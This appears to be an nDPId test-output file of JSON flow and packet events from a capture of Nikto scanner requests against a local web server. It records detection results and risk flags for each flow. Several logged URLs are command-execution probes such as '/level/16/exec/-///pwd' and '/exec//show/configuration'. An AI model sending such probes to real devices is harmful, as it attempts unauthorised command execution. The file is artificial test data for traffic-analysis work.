-01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":551,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277561,"flow_last_seen":1576420277561,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277561,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50664,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/Program%20Files\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001165)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":552,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277562,"flow_last_seen":1576420277562,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277562,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50666,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_packet_id":1,"flow_last_seen":1576420277562,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277562,"pkt":"AAAAAAAAAAAAAAAACABFAADAFKZAAEAGJ5B\/AAABfwAAAcXqH5AjeyxLwwFcDYAYAED+tAAAAQEICp1m\/mKdZv5iR0VUIC9zbXNzZW5kLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY2KQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":552,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277562,"flow_last_seen":1576420277562,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277562,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50666,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/smssend.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001166)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":553,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277564,"flow_last_seen":1576420277564,"flow_idle_time":7440000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277564,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50668,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_packet_id":1,"flow_last_seen":1576420277564,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":1576420277564,"pkt":"AAAAAAAAAAAAAAAACABFAADYoI5AAEAGm49\/AAABfwAAAcXsH5AgHJhkU1YzMYAYAED+zAAAAQEICp1m\/mOdZv5jR0VUIC9wbHMvc2ltcGxlZGFkL2FkbWluXy9kYWRlbnRyaWVzLmh0bSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01084{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":553,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277564,"flow_last_seen":1576420277564,"flow_idle_time":7440000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277564,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50668,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pls\/simpledad\/admin_\/dadentries.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001167)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":554,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277565,"flow_last_seen":1576420277565,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277565,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50670,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_packet_id":1,"flow_last_seen":1576420277565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277565,"pkt":"AAAAAAAAAAAAAAAACABFAADKFqFAAEAGJYt\/AAABfwAAAcXuH5Ag7S5xgHE61oAYAED+vgAAAQEICp1m\/mWdZv5lR0VUIC9sZXZlbC8xNi9leGVjLy0vLy9wd2QgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI1MykNCg0K"} -01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":554,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277565,"flow_last_seen":1576420277565,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277565,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50670,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/-\/\/\/pwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001253)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":555,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277566,"flow_last_seen":1576420277566,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50672,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":555,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_packet_id":1,"flow_last_seen":1576420277566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277566,"pkt":"AAAAAAAAAAAAAAAACABFAADZY3pAAEAG2KJ\/AAABfwAAAcXwH5Bf2FuYp3IH4oAYAED+zQAAAQEICp1m\/madZv5mR0VUIC9sZXZlbC8xNi9leGVjLy0vLy9zaG93L2NvbmZpZ3VyYXRpb24gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNTQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01089{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277566,"flow_last_seen":1576420277566,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50672,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/-\/\/\/show\/configuration","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001254)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":556,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277567,"flow_last_seen":1576420277567,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277567,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50674,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_packet_id":1,"flow_last_seen":1576420277567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277567,"pkt":"AAAAAAAAAAAAAAAACABFAAC9ybtAAEAGcn1\/AAABfwAAAcXyH5BbOPFKogxutoAYAED+sQAAAQEICp1m\/medZv5nR0VUIC9sZXZlbC8xNiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjU1KQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":556,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277567,"flow_last_seen":1576420277567,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277567,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50674,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001255)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":557,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277568,"flow_last_seen":1576420277568,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277568,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50676,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_packet_id":1,"flow_last_seen":1576420277568,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277568,"pkt":"AAAAAAAAAAAAAAAACABFAADDBTJAAEAGNwF\/AAABfwAAAcX0H5Cobz3BWm\/3E4AYAED+twAAAQEICp1m\/midZv5oR0VUIC9sZXZlbC8xNi9leGVjLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjU2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":557,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277568,"flow_last_seen":1576420277568,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277568,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50676,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001256)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":558,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277570,"flow_last_seen":1576420277570,"flow_idle_time":7440000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277570,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50678,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00694{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":558,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_packet_id":1,"flow_last_seen":1576420277570,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"thread_ts_msec":1576420277570,"pkt":"AAAAAAAAAAAAAAAACABFAADVrDFAAEAGj+9\/AAABfwAAAcX2H5DQ55TgYEZuMYAYAED+yQAAAQEICp1m\/mqdZv5qR0VUIC9sZXZlbC8xNi9leGVjLy9zaG93L2FjY2Vzcy1saXN0cyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI1NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01083{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":558,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277570,"flow_last_seen":1576420277570,"flow_idle_time":7440000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277570,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50678,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/\/show\/access-lists","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001257)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":559,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277572,"flow_last_seen":1576420277572,"flow_idle_time":7440000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":1,"thread_ts_msec":1576420277572,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50680,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":559,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_packet_id":1,"flow_last_seen":1576420277572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"thread_ts_msec":1576420277572,"pkt":"AAAAAAAAAAAAAAAACABFAADf3g5AAEAGXgh\/AAABfwAAAcX4H5Dm0Ob+nlg5uYAYAED+0wAAAQEICp1m\/mydZv5sR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L2NvbmZpZ3VyYXRpb24gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI1OCkNCg0K"} -01095{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":559,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277572,"flow_last_seen":1576420277572,"flow_idle_time":7440000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":1,"thread_ts_msec":1576420277572,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50680,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/configuration","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001258)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":560,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277574,"flow_last_seen":1576420277574,"flow_idle_time":7440000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277574,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50682,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":560,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_packet_id":1,"flow_last_seen":1576420277574,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":1576420277574,"pkt":"AAAAAAAAAAAAAAAACABFAADcDd9AAEAGLjt\/AAABfwAAAcX6H5DZiDUt3Agrh4AYAED+0AAAAQEICp1m\/m6dZv5uR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L2ludGVyZmFjZXMgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01092{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":560,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277574,"flow_last_seen":1576420277574,"flow_idle_time":7440000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277574,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50682,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/interfaces","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001259)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":561,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277575,"flow_last_seen":1576420277575,"flow_idle_time":7440000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420277575,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":561,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_packet_id":1,"flow_last_seen":1576420277575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1576420277575,"pkt":"AAAAAAAAAAAAAAAACABFAADj4RhAAEAGWvp\/AAABfwAAAcX8H5B4Mdnl8T5RpIAYAED+1wAAAQEICp1m\/m+dZv5vR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L2ludGVyZmFjZXMvc3RhdHVzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjApDQoNCg=="} -01100{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277575,"flow_last_seen":1576420277575,"flow_idle_time":7440000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420277575,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/interfaces\/status","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001260)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":562,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277577,"flow_last_seen":1576420277577,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50686,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 